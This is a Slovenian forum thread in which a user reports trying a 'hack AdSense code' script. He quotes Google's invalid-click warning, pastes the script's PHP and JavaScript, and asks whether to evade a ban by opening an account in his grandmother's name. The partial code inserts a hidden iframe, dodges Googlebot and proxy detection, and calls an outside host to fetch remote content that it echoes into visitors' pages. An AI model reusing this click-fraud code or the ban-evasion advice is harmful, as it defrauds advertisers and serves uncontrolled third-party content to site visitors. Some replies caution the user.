6 naročnikov
6 naročnikov
Zanima me če je kdo preizkusil http://www.hackadsensecode.info/
je kaj spornega pri tem? Je kdo že kaj več zaslužo?
LP Nejc
26 odgovorov
Posti tukaj gor princip za kaj se gre. Lahko da ni nič spornega, vendar če piše hack adsense code, pol verjetno je. :P
ok neke me zanima sn to skripto uporabo sam en dan (pa sn dobo 300klikov pa 800 obiska) pa sn jim piso da so mi hotl slabo za račun, pa če lahk te klike zbrišejo pa so mi napisal to:
It has come to our attention that invalid clicks or impressions have
been generated on the Google ads on your site(s) through users of
third-party programs paid or provided with other incentives to visit
your site. Such programs include, but are not limited to auto-surf,
pay-to-surf, pay-to-read, or pay-to-click sites.Please bear in mind that if we continue to detect invalid clicks or
impressions from these services on your ads, we may disable your
account to protect our advertisers. In addition, we may adjust your
future payments for any days during which invalid clicks occurred in
order to properly credit advertisers for any invalid activity.We understand that you may wish to receive specific information
regarding the invalid activity we observed on your account. However,
due to the proprietary nature of our algorithm, we cannot disclose any
details about how our monitoring technology works or what specifics we
found on your account.As a reminder, any method of generating invalid clicks or impressions
is strictly prohibited by our Terms and Conditions and program policies:https://www.google.com/adsense/localized-terms?hl=en_US
https://www.google.com/adsense/policies?hl=en_USFor your reference, you can find tips and guidelines for keeping your
account in good standing by visiting our Help Center at
zaj pa me zanima če se splača da bi dal oglase še na eno stran, (ker pol če mi banajo mi banajo strani in pol ne morm met oglasov na teh straneh je tak?:S) al se mi bol splača za to novo stran odpret nov account (na "babico")?
LP Pa najlepša hvala za čimprejši odgovor.P
Kako je deloval ta program oz. kaj ti je prinašal, traffic ali kaj in kako?
Koliko si zaslužil s temi 300 kliki? So zaznali da so invalid?
Za drugič veš, da se ni za igrati. ;) Čeprav si bil opozorjen.
ok ta program je deloval nekako takole da je na vsake 5 ljudi 1 krat klikno (ne me spraševat kako) pa tisti dan je prneso še neke 200 traffica s sabo pol so pa pisali da ga morem kupit pa neke pa sn kar zbriso dol:P Pol pa jaz google pišem da sm zaznal nepravilnosti pri mojem accountu oni pa so mi poslal ono zgori, zaj pa nevem če se naj za novo stran prijavim pod "babico" al naj dam kar od tega accounta oglase gor???
koda pa je bla to:
if (!ini_get('safe_mode')) {
Rename this file to any name that you think is not
Popular names are:
Basically use a filename so that when someone
chooses to view your page source, they will not
think twice about that file.
Enter your key below.
Finally, include the file as a header on the pages of your
website where you are displaying adsense ads but putting
it between the <head> and </head> tags.
<script type="text/javascript" src="set_time.php"></script>
And you are done!
This is the key we provided you to access our system.
Replace the xxxxxxxxxxxxxxxxxxxxxxx's with your key
$conf['key'] = "******************";
Do not edit anything below this line
if (!isset($_GET['js'])) {
document.writeln('<iframe src="<? echo $_SERVER['PHP_SELF'] ?>?js=1" width="0" height="0" frameborder="0" ></iframe>');
elseif (empty($_COOKIE['sfn_clk'])) {
// Google bot detection - block
$botlist = array(
foreach($botlist as $bot) {
if(ereg($bot, $_SERVER['HTTP_USER_AGENT'])) {
// Proxy detection - block
if (!empty($_SERVER['X_FORWARDED_FOR']) || !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$host = "www.hackadsensecode.info";
$link = "http://$host/core.php?k=".$conf['key']."&ip=".$ip;
$fp = fsockopen("$host",80,$errno,$errstr) or die();
fwrite($fp,"GET $link HTTP/1.1\r\nHost: $host\r\n\r\n");
$contents = '';
while ($tmp = fgets($fp,1024)) $contents .= $tmp;
$data = substr($contents,strpos($contents,"\r\n\r\n")+4);
if (!empty($data)) {
// Set a cookie to block him from clicking multiple times
echo $data;
zakaj je vseeno? kaj pol ko te bannajo lahk na isto stran (pač pod drugim imenom daš oglase?) al kak je to?
ker nevem če naj to stran kar jo zdaj delam dam pod now account al naj kar tega obdržm (ker pomoje bo mela kar neki trafica več kot ta)
LP Nejc